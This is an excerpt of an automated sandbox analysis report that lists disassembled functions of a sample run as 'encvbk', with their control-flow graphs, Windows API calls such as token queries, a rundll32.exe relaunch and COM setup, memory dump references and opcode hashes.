                                                                                          control_flow_graph 228 dd5cf1-dd5d21 NtQueryInformationToken 229 dd5d4c-dd5d55 RtlNtStatusToDosError 228->229 230 dd5d23-dd5d27 228->230 233 dd5d57-dd5d5f 229->233 234 dd5d61 229->234 231 dd5d29-dd5d2d 230->231 232 dd5d4b 230->232 231->229 235 dd5d2f-dd5d44 NtQueryInformationToken 231->235 232->229 233->234 236 dd5d65-dd5d69 234->236 237 dd5d63 234->237 235->229 238 dd5d46-dd5d49 235->238 237->236 238->229 238->232
                                                                                          APIs
                                                                                          • NtQueryInformationToken.NTDLL ref: 00DD5D17
                                                                                          • NtQueryInformationToken.NTDLL ref: 00DD5D3C
                                                                                          • RtlNtStatusToDosError.NTDLL ref: 00DD5D4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken$ErrorStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1049779487-0
                                                                                          • Opcode ID: 6055d9499efefc36a0f36bbe288a0fe78f24032b1f94b3fa313fafeaa574445c
                                                                                          • Instruction ID: 60edbddad3e8e41cf81d62d371c433f8525d79a9b413ed40946872cf3b418958
                                                                                          • Opcode Fuzzy Hash: 6055d9499efefc36a0f36bbe288a0fe78f24032b1f94b3fa313fafeaa574445c
                                                                                          • Instruction Fuzzy Hash: 4B01D471A00318BBEB209BA1AC4DBEEBBBDEB40755F500063FA01E6254D370DA04C7B0
                                                                                          Function 00DD40B1 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 239 dd40b1-dd40da NtQuerySystemInformation 240 dd40dc-dd40e0 239->240 241 dd40e4-dd40f2 call dd61b0 239->241 240->241 242 dd40e2 240->242 242->241
                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00DD40D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: 790c7c6081e21fe24ee85a89f19f02a49ef9f1e0afa66002386445f1c406d2b4
                                                                                          • Instruction ID: ba576c526f29bdfa60470e6787d7fb045b61e891d09e447452d97478990292c8
                                                                                          • Opcode Fuzzy Hash: 790c7c6081e21fe24ee85a89f19f02a49ef9f1e0afa66002386445f1c406d2b4
                                                                                          • Instruction Fuzzy Hash: 9FE09A34700308ABE710DBE48985BAEBBAC9B49308F14102BEA41E63C1DAB0E8089635
                                                                                          Function 00DD5E4F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 245 dd5e4f-dd5e78 LdrResolveDelayLoadedAPI
                                                                                          APIs
                                                                                          • LdrResolveDelayLoadedAPI.NTDLL(00DD0000,?,?), ref: 00DD5E71
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: DelayLoadedResolve
                                                                                          • String ID:
                                                                                          • API String ID: 841769287-0
                                                                                          • Opcode ID: 6f5733b63aa11c2e72bde0f967481087877529ca802a4c645528992084bd3b1d
                                                                                          • Instruction ID: 61ca1c26697175e5677af0f653dc9f5356137dfe2ca67ca60a52380efbf61147
                                                                                          • Opcode Fuzzy Hash: 6f5733b63aa11c2e72bde0f967481087877529ca802a4c645528992084bd3b1d
                                                                                          • Instruction Fuzzy Hash: DDD0C23A046248BF8B421BC2BC25D557F2AE798761B00C007F6188523086735525AB71
                                                                                          Function 00DD6510 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 246 dd6510-dd651d SetUnhandledExceptionFilter
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000064C0), ref: 00DD6515
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 2189ccac96975f1edc286afab586e4002e0bfb3df5e1f667099c85a4e0d00d3c
                                                                                          • Instruction ID: 37131316e07fe4d2998f81a2c211954853a4bd5a5910161055f026043364b28f
                                                                                          • Opcode Fuzzy Hash: 2189ccac96975f1edc286afab586e4002e0bfb3df5e1f667099c85a4e0d00d3c
                                                                                          • Instruction Fuzzy Hash: 7A9002602576004A46002B707C1D51567B06A48A1A7434552F006C4354DA5281099571
                                                                                          Function 00DD5F25 Relevance: 10.6, APIs: 7, Instructions: 138sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 120 dd5f25-dd5f4c call dd67e8 GetStartupInfoW 123 dd5f4e-dd5f5d 120->123 124 dd5f5f-dd5f61 123->124 125 dd5f77-dd5f79 123->125 127 dd5f6a-dd5f75 Sleep 124->127 128 dd5f63-dd5f68 124->128 126 dd5f7a-dd5f80 125->126 129 dd5f8c-dd5f92 126->129 130 dd5f82-dd5f8a _amsg_exit 126->130 127->123 128->126 132 dd5f94-dd5fa4 call dd6100 129->132 133 dd5fc0 129->133 131 dd5fc6-dd5fcc 130->131 135 dd5fce-dd5fdf _initterm 131->135 136 dd5fe9-dd5feb 131->136 137 dd5fa9-dd5fad 132->137 133->131 135->136 138 dd5fed-dd5ff4 136->138 139 dd5ff6-dd5ffd 136->139 137->131 140 dd5faf-dd5fbb 137->140 138->139 141 dd5fff-dd600c call dd6640 139->141 142 dd6022-dd602b 139->142 145 dd60f0-dd60ff 140->145 141->142 148 dd600e-dd6020 141->148 142->140 144 dd602d-dd6033 142->144 147 dd6036-dd603c 144->147 149 dd608d-dd6090 147->149 150 dd603e-dd6041 147->150 148->142 151 dd609e-dd60a4 149->151 152 dd6092-dd609b 149->152 153 dd605c-dd6060 150->153 154 dd6043-dd6045 150->154 151->147 156 dd60d5-dd60dc 151->156 152->151 158 dd6068-dd606a 153->158 159 dd6062-dd6066 153->159 154->149 157 dd6047-dd604a 154->157 162 dd60de-dd60e4 _cexit 156->162 163 dd60e9 156->163 157->153 161 dd604c-dd604f 157->161 160 dd606b-dd6073 call dd4136 158->160 159->160 166 dd6078-dd6084 160->166 161->153 165 dd6051-dd605a 161->165 162->163 163->145 165->157 166->156 167 dd6086-dd6087 exit 166->167 167->149
                                                                                          APIs
                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00DD6C20,00000058), ref: 00DD5F3A
                                                                                          • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 00DD5F6F
                                                                                          • _amsg_exit.MSVCRT ref: 00DD5F84
                                                                                          • _initterm.MSVCRT ref: 00DD5FD8
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00DD6004
                                                                                          • exit.MSVCRT ref: 00DD6087
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 2849151604-0
                                                                                          • Opcode ID: 770f1edbc0597c94304d8bc2592e55509910182030f880bd51ca3ecb61a038ae
                                                                                          • Instruction ID: 0a465d82b3e54f4c65143ce8e02a9bd7a7cb4f96c96d55148cf81d2fbfc8f436
                                                                                          • Opcode Fuzzy Hash: 770f1edbc0597c94304d8bc2592e55509910182030f880bd51ca3ecb61a038ae
                                                                                          • Instruction Fuzzy Hash: D141DC75A827129FDB269F68E845B7977A0EB04760F28402FE841DB394DB30CC489AB4
                                                                                          Function 00DD5C6C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48registrywindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadIconW.USER32(?,00000064), ref: 00DD5C95
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DD5CA4
                                                                                          • RegisterClassW.USER32(?), ref: 00DD5CC7
                                                                                          • CreateWindowExW.USER32(00000080,RunDLL,00DD19A0,00000000,80000000,80000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00DD5CE6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$ClassCreateCursorIconRegisterWindow
                                                                                          • String ID: RunDLL
                                                                                          • API String ID: 1446224504-1316671358
                                                                                          • Opcode ID: f08c9f51dc17eaffd4e7dd9c2f3fa075c07bc585da8d860c5c93ade06c9a7581
                                                                                          • Instruction ID: aea5940aec21b133c78116a153679ec8aee7f31dbe8dba6cf831aa09757f640b
                                                                                          • Opcode Fuzzy Hash: f08c9f51dc17eaffd4e7dd9c2f3fa075c07bc585da8d860c5c93ade06c9a7581
                                                                                          • Instruction Fuzzy Hash: 2901D3B1D01208AFEB109F9A9C88AAFBBBCEB49758F51401AF514E2240C77459048BB4
                                                                                          Function 00DD3E5B Relevance: 6.1, APIs: 4, Instructions: 108memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 208 dd3e5b-dd3e9c call dd3c66 211 dd3f62-dd3f68 208->211 212 dd3ea2-dd3eb7 call dd3d62 208->212 215 dd3ebd-dd3ec2 212->215 216 dd3f46-dd3f49 212->216 218 dd3f29-dd3f39 215->218 219 dd3ec4-dd3ec6 215->219 217 dd3f4e-dd3f5c call dd38f0 FreeLibrary 216->217 217->211 218->211 219->218 221 dd3ec8-dd3ecd 219->221 221->218 223 dd3ecf-dd3ed1 221->223 224 dd3ed4-dd3edd 223->224 224->224 225 dd3edf-dd3f0a WideCharToMultiByte LocalAlloc 224->225 226 dd3f0c-dd3f27 WideCharToMultiByte 225->226 227 dd3f3b-dd3f44 225->227 226->218 227->217
                                                                                          APIs
                                                                                            • Part of subcall function 00DD3C66: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00DD3C87
                                                                                            • Part of subcall function 00DD3C66: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00DD3C93
                                                                                            • Part of subcall function 00DD3D62: _wtoi.MSVCRT(?), ref: 00DD3D94
                                                                                            • Part of subcall function 00DD3D62: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00DD3DA0
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00DD3EF5
                                                                                          • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 00DD3F00
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00DD3F1E
                                                                                          • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 00DD3F5C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
                                                                                          • String ID:
                                                                                          • API String ID: 1343397253-0
                                                                                          • Opcode ID: f675ace17788ffeaefd48cec94eea55e9df45404ef213d9d3ea375c764b854c9
                                                                                          • Instruction ID: a3d116d70c5ce951a58ebacc87d6de4cf51a4855004c9d974ee1b0dfb7b68d6d
                                                                                          • Opcode Fuzzy Hash: f675ace17788ffeaefd48cec94eea55e9df45404ef213d9d3ea375c764b854c9
                                                                                          • Instruction Fuzzy Hash: 93314FB5A01209AFCB04CFA9D8549AFB7B9EF89704F14406AF905E7350DB319E01CB71

                                                                                          Non-executed Functions

                                                                                          Function 00DD61C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00DD62F6,00DD1000), ref: 00DD61C7
                                                                                          • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00DD62F6,?,00DD62F6,00DD1000), ref: 00DD61D0
                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00DD62F6,00DD1000), ref: 00DD61DB
                                                                                          • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00DD62F6,00DD1000), ref: 00DD61E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 3231755760-0
                                                                                          • Opcode ID: d3a4025a24e1165485f111fbfa184cf9bd3e02e6992400498395e4dce349f6e4
                                                                                          • Instruction ID: d55d6dee816c2b71caa146a73a7350d41bc22038d94d33983de3595beb5f9602
                                                                                          • Opcode Fuzzy Hash: d3a4025a24e1165485f111fbfa184cf9bd3e02e6992400498395e4dce349f6e4
                                                                                          • Instruction Fuzzy Hash: 02D0C932001305BBCB003BE1FC1EA19BF28FB44212F048402F30AD2220CB334402CB71
                                                                                          Function 00DD25B2 Relevance: 4.7, APIs: 3, Instructions: 187threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 00DD265E
                                                                                          • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00DD2737
                                                                                          • OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?), ref: 00DD27A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                          • String ID:
                                                                                          • API String ID: 4268342597-0
                                                                                          • Opcode ID: c1ef2409da3c0571fea98e2ccbec4e2ee10150b49ebacf567f62d9c9e1afbf00
                                                                                          • Instruction ID: aa9257f5c6db09eadab85c501e7f6948a5e9f44585dbe799372b7eec82411095
                                                                                          • Opcode Fuzzy Hash: c1ef2409da3c0571fea98e2ccbec4e2ee10150b49ebacf567f62d9c9e1afbf00
                                                                                          • Instruction Fuzzy Hash: E8613A35601305AFCB229F39D85467ABBF6BFA4710B19842BE84AD7360DB31E801DB71
                                                                                          Function 00DD3F6B Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlImageNtHeader.NTDLL ref: 00DD3F7A
                                                                                          • ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,?), ref: 00DD3FCA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Image$DataDirectoryEntryHeader
                                                                                          • String ID:
                                                                                          • API String ID: 3478907836-0
                                                                                          • Opcode ID: d9112173c12bd7982b5d291b2a3c5ce7a707ffc5112b194dcce674ebba94e6c4
                                                                                          • Instruction ID: e3b41ccc21da3820192d078d611a298402b4013a07659ee93e14283860abc33e
                                                                                          • Opcode Fuzzy Hash: d9112173c12bd7982b5d291b2a3c5ce7a707ffc5112b194dcce674ebba94e6c4
                                                                                          • Instruction Fuzzy Hash: 75018B756203559AD7209F71C804BA3B7F8BF05700F08059EF596DB391E771EA80CBA2
                                                                                          Function 00DD205A Relevance: 1.5, APIs: 1, Instructions: 33comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00DD161C,00000000,00000001,00DD1940,?), ref: 00DD2072
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: 11cbcbb2841ca269b91798cb09c23c925a858dcf5498b03af3b3791496f92bbb
                                                                                          • Instruction ID: 8544b4a91140c8af405788a512a3d747f1ab44ef73611e025a906f49034ac492
                                                                                          • Opcode Fuzzy Hash: 11cbcbb2841ca269b91798cb09c23c925a858dcf5498b03af3b3791496f92bbb
                                                                                          • Instruction Fuzzy Hash: B0F08239740218BFCB10DB94DC55F9DBB6DEB88710F140056FA06E7390CAB2AE01CBA4
                                                                                          Function 00DD2100 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 00DD21D8
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DD223F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFormatMessageThread
                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                          • API String ID: 2411632146-3173542853
                                                                                          • Opcode ID: b62979bb58d2dd27b5646e718c63128af9e7c228aaf94ded73017443570bc99d
                                                                                          • Instruction ID: e8dcff6b794e3250c0be9c541de9cd0cf9d9fa6468f0be02b90171e448c5f5bc
                                                                                          • Opcode Fuzzy Hash: b62979bb58d2dd27b5646e718c63128af9e7c228aaf94ded73017443570bc99d
                                                                                          • Instruction Fuzzy Hash: 4D510F71900300BADB305FA58C49F77BBB9EB65700F088A9FF14692362DA71E948CB75
                                                                                          Function 00DD3B09 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107processsynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00DD3A51: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00DD3A7B
                                                                                            • Part of subcall function 00DD3A51: memset.MSVCRT ref: 00DD3A8F
                                                                                            • Part of subcall function 00DD3A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00DD3AA6
                                                                                            • Part of subcall function 00DD3A51: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00DD3AC1
                                                                                            • Part of subcall function 00DD3A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00DD3AE1
                                                                                            • Part of subcall function 00DD3A51: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD3AF3
                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DD3B39
                                                                                          • IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00DD3B40
                                                                                          • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00DD3B6C
                                                                                          • PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00DD3B87
                                                                                          • RtlWow64IsWowGuestMachineSupported.NTDLL ref: 00DD3BA9
                                                                                          • GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,?), ref: 00DD3BC9
                                                                                          • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 00DD3BD4
                                                                                          • memset.MSVCRT ref: 00DD3BE6
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD3C08
                                                                                          • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 00DD3C16
                                                                                          • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 00DD3C20
                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 00DD3C36
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DD3C44
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DD3C50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Wow64$File$CloseHandle$CreateEnableProcessReadRedirectionSystemmemset$AppendCommandCurrentDirectoryDirectory2GuestLineMachineObjectPathPointerProcess2SingleSupportedWait
                                                                                          • String ID: rundll32.exe
                                                                                          • API String ID: 1294557600-3034741169
                                                                                          • Opcode ID: 65aec23028c75846522d8d52bf25dc6f96d76689843b72234012a688c090ad81
                                                                                          • Instruction ID: 50e1569da5ca61cd95bf588d889f874c6b1e65866ff37ffc96f05fa3d370f52f
                                                                                          • Opcode Fuzzy Hash: 65aec23028c75846522d8d52bf25dc6f96d76689843b72234012a688c090ad81
                                                                                          • Instruction Fuzzy Hash: 11315372901329ABDF21AB60DC8DFEAB77CAB08700F050197E509D2250DB359B85DBB1
                                                                                          Function 00DD37C3 Relevance: 15.1, APIs: 10, Instructions: 102threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00DD37D4
                                                                                          • CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00DD19CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00DD37F0
                                                                                          • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00DD38E7
                                                                                            • Part of subcall function 00DD205A: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00DD161C,00000000,00000001,00DD1940,?), ref: 00DD2072
                                                                                          • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00DD3808
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD381D
                                                                                            • Part of subcall function 00DD53AD: InitOnceExecuteOnce.API-MS-WIN-CORE-SYNCH-L1-2-0(00DD84A4,00DD53D0,00000000,00000000,00DD382A), ref: 00DD53BB
                                                                                          • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00DD3866
                                                                                          • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3873
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD387A
                                                                                          • CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00DD8420,?), ref: 00DD3897
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00DD38D9
                                                                                          Memory Dump Source
